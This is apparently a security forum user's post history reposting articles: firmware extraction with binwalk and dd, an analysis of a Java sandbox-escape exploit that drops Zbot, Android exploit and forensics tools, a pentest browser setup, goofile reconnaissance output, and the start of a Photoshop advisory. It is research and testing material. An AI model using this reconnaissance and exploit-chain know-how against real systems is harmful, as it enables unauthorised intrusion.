Everything posted by Nytro

  1. [h=1]Reverse Engineering Firmware: Linksys WAG120N[/h]By Craig | May 29, 2011 | Embedded Systems, Tutorials

The ability to analyze a firmware image and extract data from it is extremely useful. It allows you to examine an embedded device for bugs, vulnerabilities, or GPL violations without ever having access to the device. In this tutorial, we'll be examining the firmware update file for the Linksys WAG120N with the intent of finding and extracting the kernel and file system from the firmware image. The firmware image used is for the WAG120N hardware version 1.0, firmware version 1.00.16 (ETSI) Annex B, released on 08/16/2010 and currently available for download from the Linksys website.

The first thing to do with a firmware image is to run the Linux file utility against it to make sure it isn't a standard archive or compressed file; you don't want to sit down and start analyzing a firmware image only to realize later that it's just a ZIP file. In this case, it's nothing known to the file utility. Next, let's do a hex dump and run strings on it.

Looking at the strings output, we see references to the U-Boot boot loader and the Linux kernel. This is encouraging, as it suggests that the device does in fact run Linux, and U-Boot is a very common and well-documented boot loader. A quick look at the hexdump, however, doesn't immediately reveal anything interesting, so let's run binwalk against the firmware image to see what it can identify for us. There are a lot of false positive matches (these will be addressed in the upcoming 0.3.0 release!), but a few results stand out: binwalk has found two uImage headers (the header format used by U-Boot), each of which is immediately followed by an LZMA compressed file. Binwalk breaks out most of the information contained in these uImage headers, including their descriptions ('u-boot image' and 'MIPS Linux-2.4.31') and the reported compression type of 'lzma'.
Since each uImage header is followed by LZMA compressed data, this information appears to be legitimate. The LZMA files can be extracted with dd and then decompressed with the lzma utility. Don't worry about specifying a size limit when running dd; any trailing garbage will be ignored by lzma during decompression. We are now left with the decompressed files 'uboot' and 'kernel', and running strings against them confirms that they are in fact the U-Boot and Linux kernel images.

We've got the kernel and the boot loader images; now all that's left is finding and extracting the file system. Since binwalk didn't find any file systems that looked legitimate, we're going to have to do some digging of our own. Let's run strings against the extracted Linux kernel and grep the output for any file system references; this might give us a hint as to what file system(s) we should be looking for. Ah! SquashFS is a very common embedded file system. Although binwalk has several SquashFS signatures, it is not uncommon to find variations of the 'sqsh' magic string (which indicates the beginning of a SquashFS image), so what we may be looking for here is a non-standard SquashFS signature inside the firmware file.

So how do we find an unknown signature inside a 4MB binary file? Different sections inside of firmware images are often aligned to a certain size. This means there will usually be some padding between sections, as the size of each section will almost certainly not fall exactly on an alignment boundary. An easy way to find these padded sections is to search for lines in our hexdump output that start with an asterisk ('*'): when hexdump sees the same bytes repeated many times, it replaces them with an asterisk to indicate that the last line was repeated.
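The dd-and-lzma extraction described above can be sketched as a small helper. The offsets below are hypothetical placeholders, not values from the post; take the real ones from binwalk's output for your image. No count= is passed to dd because, as noted, lzma ignores trailing garbage during decompression.

```shell
# carve <image> <byte-offset> <outfile>: copy everything from <byte-offset>
# to the end of <image> into <outfile>; trailing garbage is fine for lzma.
carve() {
  dd if="$1" bs=1 skip="$2" of="$3" 2>/dev/null
}

# Hypothetical offsets -- substitute the ones binwalk reported:
# carve firmware.bin 16444   uboot.lzma  && lzma -d uboot.lzma   # -> 'uboot'
# carve firmware.bin 1049664 kernel.lzma && lzma -d kernel.lzma  # -> 'kernel'
```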
A good place to start looking for a file system inside a firmware image is immediately after these padded sections of data, as the start of the file system will likely need to fall on one of these aligned boundaries. There are a couple of interesting sections that contain the string 'sErCoMm'. This could be something, but given the small size of some of these sections and the fact that they don't appear to have anything to do with SquashFS, it is unlikely. There are some other sections as well, but again, these are very small, much too small to be a file system.

Then we come across a section containing the string 'sqlz'. The standard SquashFS image starts with 'sqsh', but we've already seen that the firmware developers used LZMA compression elsewhere in this image. Also, most firmware that uses SquashFS tends to use LZMA compression instead of the standard zlib compression. So this could be a modified SquashFS signature: a concatenation of 'sq' (SQuashfs) and 'lz' (LZma). Let's extract it with dd and take a look.

Of course, 'sqlz' is not a standard signature, so the file utility still doesn't recognize our extracted data. Let's try editing the 'sqlz' string to read 'sqsh'. Running file against our modified SquashFS image gives us much better results: this definitely looks like a valid SquashFS image! But due to the LZMA compression and the older SquashFS version (2.1), you won't be able to extract any files from it using the standard SquashFS tools. However, the unsquashfs-2.1 utility included in Jeremy Collake's firmware mod kit works perfectly. Now that we know this works, we should go ahead and add this new signature to binwalk so that it will identify the 'sqlz' magic string in the future.
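The extract-and-patch step described above amounts to two commands. The filesystem offset is a placeholder you must read from your own hexdump output; the 4-byte overwrite is exactly the 'sqlz' to 'sqsh' edit just described.

```shell
# fix_magic <file>: overwrite the first four bytes with the standard
# SquashFS magic 'sqsh', without truncating the rest of the file.
fix_magic() {
  printf 'sqsh' | dd of="$1" bs=1 count=4 conv=notrunc 2>/dev/null
}

# dd if=firmware.bin of=rootfs.squashfs bs=1 skip=$OFFSET  # OFFSET: from hexdump
# fix_magic rootfs.squashfs
# file rootfs.squashfs   # should now report a Squashfs filesystem
```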
Adding this new signature is as easy as opening binwalk's magic file (/etc/binwalk/magic), copying the 'sqsh' signature, and changing 'sqsh' to 'sqlz'. Re-running binwalk against the original firmware image, we see that it now correctly identifies the SquashFS entry. And there you have it: we successfully identified and extracted the boot loader, kernel, and file system from this firmware image, plus we have a new SquashFS signature to boot!

Source: Reverse Engineering Firmware: Linksys WAG120N | /dev/ttyS0
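That copy/paste can also be scripted. Note this is an approximation: the real 'sqsh' entry in binwalk's magic file may span several lines (continuation fields), and this sketch only duplicates the lines that name the magic string itself.

```shell
# add_sqlz_sig <magic-file>: append a copy of every 'string sqsh' rule
# with the magic string changed to 'sqlz'.
add_sqlz_sig() {
  grep 'string sqsh' "$1" | sed 's/string sqsh/string sqlz/' >> "$1"
}

# add_sqlz_sig /etc/binwalk/magic   # then re-run binwalk on the image
```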
  2. binwalk Firmware Analysis Tool

[h=1]About[/h]Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images, such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc.

[h=1]News[/h]Version 0.4.2 includes significant speed improvements over previous versions, as well as the addition of some new search options (--grep and --raw-bytes).

Version 0.4.0 released. Added support for Linux block devices and building against libmagic rather than the included file utility code. Fixed minor bugs and updated/added signatures.

Version 0.3.9 released. Added build options to disable update features (thus disabling the zlib and libcurl requirements). Added long options. Fixed minor bugs and updated/added signatures.

Download: http://code.google.com/p/binwalk/downloads/list

Source: binwalk - Firmware Analysis Tool - Google Project Hosting
  3. Insecure magazine - RSA Conference

Details inside.

Download: http://www.net-security.org/dl/insecure/INSECURE-Mag-RSA2012.pdf
  4. [h=3]An interesting case of JRE sandbox breach (CVE-2012-0507)[/h] 20 Mar 2012 2:55 AM

Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. Samples like these are somewhat unusual to see, but they can be used to develop highly reliable exploits. The malicious Java applet is loaded from an obfuscated HTML file. The applet contains two Java class files: one triggers the vulnerability and the other is a loader class. The vulnerability-triggering class performs deserialization of an object array and uses a flaw in AtomicReferenceArray to disarm the JRE sandbox mechanism; the attacker deliberately crafted the serialized object data. This reference array issue is very serious because the exploit relies not on memory corruption but on a logical flaw in the handling of the array. That makes the exploit highly reliable, which may be one of the reasons the bad guys picked this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507.

Figure 1: The vulnerability-triggering class

The loader class is called from the vulnerability-triggering class. It can load additional classes in an escalated privilege context and perform any operation, escaping the sandbox mechanism. The loader creates a new class on the fly and uses it to do malicious jobs with escalated privileges. The third class, loaded by the loader class, downloads a malicious file, decodes it using a simple XOR algorithm, saves it into a local temporary folder, and executes it using Runtime's exec method. The decoded malicious file is detected as PWS:Win32/Zbot.gen!Y. The following diagram shows the overall process of exploitation.
A.class is the vulnerability-triggering class, B.class is the loading class, and C.class is the third class that downloads, decodes, and executes a malicious binary.

Figure 2: The overall view of exploitation

The following code shows the actual decoding routine inside the C.class file. The routine uses a very simple form of XOR decoding.

Figure 3: Decoding routine inside the C.class file

Example SHA1s:

fc1ab8bf716a5b3450701ca4b2545888a25398c9 (detected as Exploit:Java/CVE-2012-0507.A)
03e26e735b2f33b3b212bea5b27cbefb2af4ed34 (detected as Exploit:Java/CVE-2012-0507.

The good news is that the vendor has provided a patch for this vulnerability since late February. Just make sure you have the latest JRE version installed on your system, or visit the patch update advisory page to see if you require any updates. So please, update your JRE installations and protect yourself.

Jeong Wook (Matt) Oh & Chun Feng

Source: An interesting case of JRE sandbox breach (CVE-2012-0507) - Microsoft Malware Protection Center - Site Home - TechNet Blogs
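The post does not disclose the sample's key, but the "simple XOR algorithm" it describes amounts to XOR-ing each payload byte with a fixed key. Here is a hedged sketch of that idea; the key value (0x77) and file names are made up for illustration.

```shell
# xor_decode <infile> <outfile> <key>: XOR every byte of <infile> with the
# single-byte integer <key> and write the result to <outfile>.
xor_decode() {
  in=$1; out=$2; key=$3
  : > "$out"
  for b in $(od -An -v -tx1 "$in"); do            # hex dump, one byte per word
    printf "\\$(printf '%03o' $(( 0x$b ^ key )))" >> "$out"
  done
}

# xor_decode downloaded.bin dropped.exe 119   # hypothetical key 0x77
```

Because XOR with a fixed key is its own inverse, running the same function on the decoded output with the same key restores the original file.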
  5. [h=3]Acquisition and Analysis of Volatile Memory from Android Devices[/h] [h=2]Monday, January 9, 2012[/h]

We are happy to announce that our paper on Android memory forensics has just been published in the Journal of Digital Investigations! This paper covers a number of topics that we believe will be of interest to both practitioners and researchers in the memory forensics field. The two main contributions of the paper are:

1. A kernel module that is able to acquire a complete memory capture from Android devices as well as other Linux computers. This module is unique in that it operates solely within the kernel and does not require userland interaction, which preserves memory much more effectively than other kernel modules; a complete comparison of the efficiency is given in the paper. The module can also acquire memory over the network, which saves the investigator from having to write to the phone's internal storage or SD card.

2. Additions to the Volatility memory analysis framework that allow it to analyze Android kernel memory. This allows all of the Linux analysis plugins to be used against Android memory captures.

There is also discussion of the difficulty of performing generic memory analysis of Android devices, as well as the differences between the ARM and Intel architectures, on which the majority of previous memory forensics research has been performed.

If you are interested in this research and are going to be at Shmoocon, Joe Sylve (@jtsylve) will be there presenting the memory acquisition module as well as the Volatility capabilities. You can also leave comments on the blog or find us on Twitter.

Download: http://digitalforensicssolutions.com/papers/android-memory-analysis-DI.pdf

Source: Digital Forensics Solutions: New Paper - Acquisition and Analysis of Volatile Memory from Android Devices
  6. Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities

A free framework for bug hunters to find vulnerabilities, write proof-of-concept exploits, and play in Android. Use dynamic analysis on Android applications and devices for quicker security assessments. Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices. The easy extensions interface allows users to write custom modules and exploits for Mercury. Replace custom applications and scripts that perform single tasks with a framework that provides many tools.

Mercury allows you to:

- Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services
- Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see)
- Find information on installed packages with optional search filters to allow for better control
- Use built-in commands that can check application attack vectors on installed applications
- Upload and download files between the Android device and computer without using ADB (this means it can be done over the internet as well!)
- Create new modules to exploit your latest finding on Android, and play with those that others have found

This demonstration shows how you can find and exploit SQL injection in Android applications using Mercury.

Download: http://labs.mwrinfosecurity.com/assets/254/mercury-v1.0.zip
Guide: http://www.reddit.com/tb/r3atb

Source: Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities | The Hacker News (THN)
  7. Info: http://www.securitybydefault.com/2012/03/exploit-de-joomla-paso-paso.html
  8. [h=1]VIDEO: How to solve the RSA 2012 #sophospuzzle[/h] by Paul Ducklin on March 20, 2012

Here is a video showing you how to solve the RSA 2012 crypto puzzle which featured on our conference T-shirts at this year's RSA hootenanny in San Francisco. We've awarded one NERF gun prize to the first finisher, @trapflag, and a second to Robert Miller, who was randomly chosen (using a hardware random number generator made from coins and playing cards) from the 19 other successful solvers. Winners, please email me to let me know where to send the prizes. For those of you who didn't finish, here's how to do it. (Enjoy this video? Check out more on the SophosLabs YouTube channel.)

The second stage of this puzzle involved writing code to perform a cryptographic brute force attack; although there were numerous optimisations you could apply, there were no short cuts. That means you really had to back yourself that your code was correctly written, so well done to all who took part, and especially to the 20 of you who cracked the puzzle in time. If you enjoy this sort of puzzle, watch this space: we intend to run them regularly. You might also enjoy watching or trying previous #sophospuzzles!

Source: VIDEO: How to solve the RSA 2012 #sophospuzzle | Naked Security
  9. [h=3]SSL optimization and security talk[/h] Filed under: Crypto, Network, Protocols, Security — Nate Lawson @ 6:12 am

I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention.

False Start provides a minor improvement over stock SSL, which takes two round trips in the initial handshake before application data can be sent. It saves one round trip on the initial handshake at the cost of sending data before checking for someone modifying the server's handshake messages. It doesn't provide any benefit on subsequent connections, since the stock SSL resume protocol also takes only one round trip.

The False Start designers were aware of this risk, so they suggested the client whitelist ciphersuites for use with False Start. The assumption is that an attacker could get the client to provide ciphertext but wouldn't be able to decrypt it if the encryption was secure. This is true most of the time, but it is not sufficient. The BEAST attack is a good example where ciphersuite whitelists are not enough. If a client used False Start as described in the standard, it couldn't detect an attacker spoofing the server version in a downgrade attack. Thus, even if both the client and server supported TLS 1.1, which is secure against BEAST, False Start would have made the client insecure. Stock SSL would detect the version downgrade attack before sending any data and thus be safe. The False Start standard (or at least implementations) could be modified to only allow False Start if the TLS version is 1.1 or higher, but this wouldn't prevent downgrade attacks against TLS 1.1 or newer versions. You can't both be proactively secure against the next protocol attack and use False Start. This may be a reasonable tradeoff, but it does make me a bit uncomfortable.
Snap Start removes both round trips for subsequent connections to the same server, one better than stock SSL session resumption. Additionally, it allows rekeying, whereas session resumption uses the same shared key. The security cost is that Snap Start removes the server's random contribution.

SSL is designed to fail safe. For example, neither party solely determines the nonce; instead, the nonce is derived from both client and server randomness, so poor PRNG seeding by one of the participants doesn't affect the final output. Snap Start lets the client determine the entire nonce, and the server is expected to check it against a cache to prevent replay. There are measures to limit the size of the cache, but a cache can't tell you how good the entropy is. Therefore, the nonce may be unique but still predictable. Is this a problem? Probably not, but I haven't analyzed how a predictable nonce affects all the various operating modes of SSL (e.g., ECDH, client cert auth, SRP auth, etc.)

The key insight behind both of these proposed changes to SSL is that latency is an important issue for SSL adoption, even with session resumption built in from the beginning. Also, Google is willing to shift the responsibility for SSL security towards the client in order to save on latency. This makes sense when you own a client and your security deployment model is to ship frequent client updates. It's less clear that this tradeoff is worth it for SSL applications besides HTTP or for other security models.

I appreciate the work people like Adam have been doing to improve SSL performance and security. Obviously, unprotected HTTP is worse than some reductions in SSL security. However, careful study is needed by the many users of these kinds of protocol changes before their full impact is known. I remain cautious about adopting them.

Source: SSL optimization and security talk
  10. [h=3]Configuring Firefox For Web App Pen Testing[/h][h=2]15 March 2012[/h]

You know the routine: you get a gig doing a web app pen test. You break out Burp (or whatever lesser proxy you prefer), and get ready to ruin some developer's day. And then, just as you get ready to load the target URL and start, this happens: It's annoying. Your logs are polluted, and if you have to turn them over to the client, the extra noise strips some of the professionalism from your image (as a sidenote: Burp's "only save in-scope items" feature helps quite a lot with this).

Here, then, is a quick guide on how to tweak Firefox so that it doesn't spew stupid crap into your web app pen test log files. I may come back and explain the "why" behind some of these later, but for now, just the "how" will have to do. (Note: some of these settings reduce the security of the browser. My presumption here is that Firefox will only be used for testing, not for general purpose browsing. The settings below reflect that.)

1) Open about:config
2) Disable Safe Browsing
3) Disable Pipelining
4) Disable Pre-fetching
5) Remove all bookmarks
6) Set homepage to about:blank for startup
7) Make sure history is enabled, but disable search suggestions
8) Disable checking for updates
9) Just say no to helping developers
10) Disable updates for sync

That's it. Now you can go forth and break all the things, knowing that your log files will be nice and tidy afterwards.

Posted by Jason Ross at 14:04

Source: cruft: Configuring Firefox For Web App Pen Testing
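Most of the steps above can be scripted by dropping a user.js into the testing profile. The pref names below are assumptions based on Firefox of that era; verify each against about:config on your version. Bookmark removal (step 5) has no pref and stays manual.

```shell
# write_prefs <profile-dir>: write a user.js covering steps 2-4 and 6-8.
# Pref names are assumptions -- confirm them in about:config first.
write_prefs() {
  cat > "$1/user.js" <<'EOF'
user_pref("browser.safebrowsing.enabled", false);         // step 2: Safe Browsing
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("network.http.pipelining", false);              // step 3: pipelining
user_pref("network.prefetch-next", false);                // step 4: pre-fetching
user_pref("browser.startup.homepage", "about:blank");     // step 6: homepage
user_pref("browser.search.suggest.enabled", false);       // step 7: suggestions
user_pref("app.update.enabled", false);                   // step 8: update checks
EOF
}

# write_prefs ~/.mozilla/firefox/pentest.profile
```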
  11. [h=3]BackTrack tool review: goofile[/h] [h=2]08 March 2012[/h]

Note: This is part of a series on BackTrack 5 tool reviews. It is not meant to be an exhaustive analysis of any tool, just a demonstration of the tool using real-world targets.

Goofile is a simple script that searches Google for specific file types from specific domains. This is useful if you're looking for specific types of files because it parses the results for you.

root@bt:/pentest/enumeration/google/goofile# ./goofile.py
-------------------------------------
|Goofile v1.5 |
|Coded by Thomas (G13) Richards |
|www.g13net.com |
|code.google.com/p/goofile |
-------------------------------------

Goofile 1.5
usage: goofile options
-d: domain to search
-f: filetype (ex. pdf)
example: ./goofile.py -d test.com -f txt

Using un.org (one of our common examples), we can quickly put together a list of PDF files from the domain:

root@bt:/pentest/enumeration/google/goofile# ./goofile.py -d un.org -f pdf
-------------------------------------
|Goofile v1.5 |
|Coded by Thomas (G13) Richards |
|www.g13net.com |
|code.google.com/p/goofile |
-------------------------------------

Searching in un.org for pdf
========================================
Files found:
====================
www.un.org/sport2005/a_year/questions.pdf
www.un.org/un60/60ways_short.pdf
www.un.org/millenniumgoals/MDG2011_Asia_EN.pdf
www.un.org/millenniumgoals/MDG2011_na_EN.pdf
www.un.org/largerfreedom/executivesummary.pdf
www.un.org/summit2005/events_schedule.pdf
www.un.org/secureworld/report3.pdf
www.un.org/millenniumgoals/MDG2011_PRa_EN.pdf
www.un.org/WCAR/durban.pdf
www.un.org/summit2005/calendar.pdf
www.un.org/secureworld/report.pdf
www.un.org/secureworld/report2.pdf
www.un.org/millenniumgoals/MDG2011_SSA_EN.pdf
www.un.org/WCAR/aconf189_12.pdf
www.un.org/peace/bnote010101.pdf
www.un.org/events/res_1325e.pdf
www.un.org/secureworld/brochure.pdf
www.un.org/millenniumgoals/MDG2012_MediaContact_EN.pdf
www.un.org/peace/ppbm.pdf
www.un.org/millenniumgoals/MDG2011_cca_EN.pdf
www.un.org/millenniumgoals/MDG2011_wa_EN.pdf
www.un.org/smallislands2005/parallel.pdf
www.un.org/esa/population/publications/adoption2010/child_adoption.pdf
www.un.org/en/hq/dm/pdfs/RFS_Accountability.pdf
www.un.org/esa/population/publications/reprobehavior/partrepro.pdf
www.un.org/depts/los/general_assembly/study/study_files/unep_basel_convention.pdf
www.un.org/depts/los/general_assembly/.../unep_basel_convention.pdf
www.un.org/depts/los/general_assembly/study/study_files/germany_e.pdf
www.un.org/depts/los/general_assembly/study/study.../germany_e.pdf
www.un.org/events/smallarms2005/bms_faq_e.pdf
www.un.org/democracyfund/Docs/UU13.pdf
www.un.org/partnerships/Docs/Newsletter.pdf
www.un.org/millenniumgoals/pdf/mg1_hunger_badiane.pdf
www.un.org/russian/summit2005/outcome.pdf
www.un.org/democracyfund/Docs/UNDEF_brochure.pdf
www.un.org/millenniumgoals/pdf/rockefeller_march_25_prep.pdf
www.un.org/disabilities/documents/user_survivor_initiatives.pdf
www.un.org/millenniumgoals/pdf/PR_Africa_MDG09_EN.pdf
www.un.org/partnerships/Docs/Fellows_2010_bios.pdf
www.un.org/partnerships/Docs/GSCP_Guide.pdf
www.un.org/millenniumgoals/pdf/josette_sheeran_8mar2010.pdf
www.un.org/durbanreview2009/pdf/summary_report.pdf
www.un.org/millenniumgoals/pdf/MDG_FS_7_EN.pdf
www.un.org/millenniumgoals/pdf/sha_zukang_8mar2010.pdf
www.un.org/millenniumgoals/pdf/mdg_snapshot_16mar.pdf
www.un.org/webcast/pdfs/21century59.pdf
www.un.org/esa/peacebuilding/mapping.pdf
www.un.org/partnerships/Docs/MSD_Partnerships.pdf
www.un.org/chinese/millenniumgoals/MDGProgressChart2006.pdf
www.un.org/partnerships/Docs/Organisation_UNOP.pdf
www.un.org/millenniumgoals/pdf/MDG2010_PR_EN.pdf
www.un.org/sg/ethicalstandards/PublicDisclosure.pdf
www.un.org/durbanreview2009/pdf/E_Bulletin_Issue1_10_2008.pdf
www.un.org/millenniumgoals/pdf/Press_release_MDG_Gap_2009.pdf
www.un.org/democracyfund/Docs/UU09.pdf
www.un.org/sg/files/staff_fd_form.pdf
www.un.org/WCAR/journal/j31aug.pdf
www.un.org/law/books/IntlLawAsLanguageForIntlRelations.pdf
www.un.org/democracyfund/Docs/Worth_Reading_Laos_Newsletter_Vol1.pdf
www.un.org/democracyfund/.../Worth_Reading_Laos_Newsletter_Vol1.pdf
www.un.org/partnerships/Docs/Philanthropy_UK_profile_Ted_Turner.pdf
www.un.org/millenniumgoals/pdf/EPG_Report_031511_B_ENGLISH_w.pdf
www.un.org/millenniumgoals/.../EPG_Report_031511_B_ENGLISH_w.pdf
www.un.org/millenniumgoals/sgreport2004.pdf
www.un.org/webcast/pdfs/21century60Azerbaijan.pdf
www.un.org/millenniumgoals/pdf/MDG_H_LatinAm.pdf
www.un.org/law/technical/FinalReport.pdf
www.un.org/millennium/declaration/ares552e.pdf
www.un.org/regionalcommissions/CSW2010/escwa.pdf
panel.pdf
www.un.org/waterforlifedecade/pdf/05_2010_reader_financing_eng.pdf
www.un.org/millenniumgoals/pdf/WaterAid_sanitation_and_water.pdf
www.un.org/disabilities/documents/review_of_disability_and_the_mdgs.pdf
endviolence.un.org/pdf/unite_framework_en.pdf
www.un.org/millenniumgoals/pdf/MDG_PR_EN.pdf
www.un.org/law/trustfund/eterms.pdf
www.un.org/regionalcommissions/CSW2010/eclac.pdf
www.un.org/disabilities/documents/csw56_ortoleva.pdf
www.un.org/millenniumgoals/pdf/mdg_pressrel_sept2010.pdf
www.un.org/millenniumgoals/pdf/MDG_FS_8_EN.pdf
www.un.org/waterforlifedecade/pdf/05_2011_human_right_to_water_reader_eng.pdf
www.un.org/.../pdf/05_2011_human_right_to_water_reader_eng.pdf
www.un.org/webcast/pdfs/21century62.pdf
www.un.org/millenniumgoals/sgreport2002.pdf
www.un.org/democracyfund/Docs/UU_11.pdf
www.un.org/webcast/pdfs/21century45.pdf
www.un.org/waterforlifedecade/pdf/hrw_glossary_eng.pdf
www.un.org/law/books/CollectionOfEssaysByLegalAdvisers.pdf
www.un.org/millenniumgoals/pdf/PR_NorthAfrica_MDG09_EN.pdf
www.un.org/millenniumgoals/SG_MDGREport2011_ecosoc-7july2011.pdf
www.un.org/durbanreview2009/pdf/InfoNote_10_Indigenous_Peoples_En.pdf
www.un.org/ga/civilsocietyhearings/infonote.pdf
www.un.org/democracyfund/Docs/AfricanCharterDemocracy.pdf
www.un.org/democracyfund/Docs/Third_Round.pdf
www.un.org/media/main/roadmap122002.pdf
www.un.org/millenniumgoals/pdf/MDG_G_CIS.pdf
www.un.org/docs/sc/Forecast.pdf
www.un.org/WCAR/journal/journalE.pdf
www.un.org/millenniumgoals/2011_Gap_Report/2011MDGGAP_PR_EN.pdf
www.un.org/millenniumgoals/2011_Gap.../2011MDGGAP_PR_EN.pdf
www.un.org/millenniumgoals/pdf/MDG_FS_2_EN.pdf
www.un.org/durbanreview2009/pdf/InfoNote_09_Peoples_of_African_Descent_En.pdf
www.un.org/.../pdf/InfoNote_09_Peoples_of_African_Descent_En.pdf
www.un.org/millenniumgoals/pdf/MDG_FS_4_EN.pdf
www.un.org/partnerships/Docs/BJ_Speech.pdf
www.un.org/waterforlifedecade/pdf/water_for_life_award_eng.pdf
www.un.org/millenniumgoals/pdf/MDG_C_Asia.pdf
www.un.org/webcast/pdfs/unia1326.pdf
====================

Source: http://theprez98.blogspot.com/2012/03/backtrack-tool-review-goofile.html
  12. [h=1]The big leak: Microsoft's epic security fail[/h]March 19, 2012

[h=2]It appears the source of a recent zero-day exploit was Microsoft's program to prevent zero-day exploits. Why is Cringely not surprised?[/h]

By Robert X. Cringely | InfoWorld

Some words just seem to go together: "bread" and "butter"; "trial" and "error"; "Microsoft" and "security breach." The MS12-020 Remote Desktop Protocol vulnerability revealed last week shows once again that when it comes to data security, Microsoft is its own worst enemy and any "secure" system can be compromised.

As Computerworld's Gregg Keizer reports, the proof-of-concept RDP exploit was developed by Italian security wonk Luigi Auriemma last May. He passed it on to HP's bug bounty program, aka the Zero Day Initiative, in August. HP's ZDI passed Auriemma's code to Microsoft, which shared it with the 79 antivirus security partners in its Microsoft Active Protections Program (MAPP). That list includes the biggest names in computer security, as well as some lesser-known European and Asian firms. Somewhere along the line that code escaped from the lab and is now in the wild, infecting unsuspecting citizens and creating an army of flesh-eating zombies. (Sorry, I was confusing it with "The Walking Dead." My bad.)

Last week Auriemma found the exploit code he'd created on a Chinese website, along with telltale signs that proved it was the same code he had written and that this code had been passed on to Microsoft before being leaked. Now we have three key suspects: Mr. Ballmer in the library with the candlestick, Ms. Whitman in the conservatory with the rope, or Premier Wen Jiabao in the lotus garden with the rainbow sword.

Microsoft is pointing the finger at its MAPP partners, and it's probably right, given how easily Symantec was pwned by ********* for its source code last year. I'm not saying Symantec is the leaker (though that's the first place I'd look, simply because of the hack) or that ********* is the leakee. If it were the Anons, you'd think they'd be crowing their heads off about it right about now. Still, you wouldn't have to be a hacking mastermind to pull this off. A little social engineering to gain access to an email list, a quick search of the inbox for a message containing the log-on and password to the MAPP program -- boom, you're in. Then post the code on a hacker-friendly forum and wait for the walls to come tumbling down.

The effect of the RDP vulnerability, if you're unlucky enough to encounter it: the blue screen of death. In other words, no perceptible difference from Windows' normal operation. And Microsoft has already released a patch. No harm, no foul, right?

Not exactly. Unless this leak is found and patched immediately, the system created to combat zero-day exploits could soon become the leading source for zero-day exploits. The RDP attack can't be the only bad code these guys were playing with, and the next worm-ready malware may not be so benign or so obvious. Even if this leak begins and ends with the RDP exploit, the system has been compromised and can no longer be trusted. Without an early-warning system for these kinds of exploits, we all just got a whole lot less secure. As Luigi wrote on his personal site:

If the author of the leak is one of the MAPP partners... it's the epic fail of the whole system, what do you expect if you give the [proof of concept] to your "super trusted" partners?

Epic fail. Another two words that go together -- like "Microsoft" and "insecurity."

Is this leak as serious as it sounds? Did I leave any metaphor unturned? Post your thoughts below or email me: cringe@infoworld.com.

This article, "The big leak: Microsoft's epic security fail," was originally published at InfoWorld.com.

Source: The big leak: Microsoft's epic security fail | Cringely - InfoWorld
  13. [h=1]Compiling Nmap for Android[/h]

This tutorial will show you how to compile the latest version of Nmap for your Android device, starting from a standard Ubuntu install. I will offer instructions for obtaining two compilers I've had success building Android software with: the Android NDK and the free Lite ARM compiler from Mentor (formerly CodeSourcery). Hopefully you can take these instructions and try to compile other tools for Android.

The build environment and instructions come from an auditor with strong technical skills who is not a programmer or developer, so hopefully my viewpoint can help other individuals who are also not developers. I've built cross-compile environments for OpenWrt, Nokia Maemo, and Familiar Linux (iPaq) in the past, but always by piecing together instructions from multiple Google queries and forum searches. I'm creating this document so it will be helpful for somebody else's Google search.

After the Ubuntu installation, here are ALL the steps you can/should take to compile Nmap for Android. I like vim as my command-line editor; you can use whichever editor you prefer. Here is a quick rundown of what is done. Everything (almost) is done from a terminal window:

- Update all Ubuntu software and install all files and tools needed to compile software on Ubuntu
- Download the software required to compile for Android
- Set up the environment to compile for Android
- Create a source folder in the home directory for downloading and compiling the software
- Download the software, patch, configure, and compile
- Install Android SDK Platform Tools to copy files to your phone
- Copy files to the phone and set the PATH environment variable

(read more) (download PDF)

Download: http://www.jedge.com/docs/Compile%20Nmap%20for%20Android.pdf

Source: Compiling Nmap for Android
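As a rough sketch of the environment setup these steps walk through: the toolchain path and target triplet below are assumptions for a typical Sourcery G++ Lite install, not values taken from the PDF. Adjust them to wherever your toolchain lives (or to the NDK's toolchain) before running configure.

```shell
# Hypothetical Sourcery G++ Lite install location -- adjust to your system.
TOOLCHAIN="$HOME/CodeSourcery/Sourcery_G++_Lite"
TRIPLET=arm-none-linux-gnueabi

# Put the cross-compilers on PATH and point the build at them.
export PATH="$TOOLCHAIN/bin:$PATH"
export CC=$TRIPLET-gcc
export CXX=$TRIPLET-g++

# From the nmap source directory, cross-compile for ARM (zenmap needs GTK,
# so it is skipped):
# ./configure --host=$TRIPLET --without-zenmap
# make
```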
14. [h=1]Adobe Photoshop 12.1 Tiff Parsing Use-After-Free[/h]
#####################################################################################
Application: Adobe Photoshop 12.1 Tiff Parsing Use-After-Free
Platforms: Windows
{PRL}: 2012-07
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[6] Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition. Alongside Photoshop and Photoshop Extended, Adobe also publishes Photoshop Elements and Photoshop Lightroom, collectively called "The Adobe Photoshop Family".
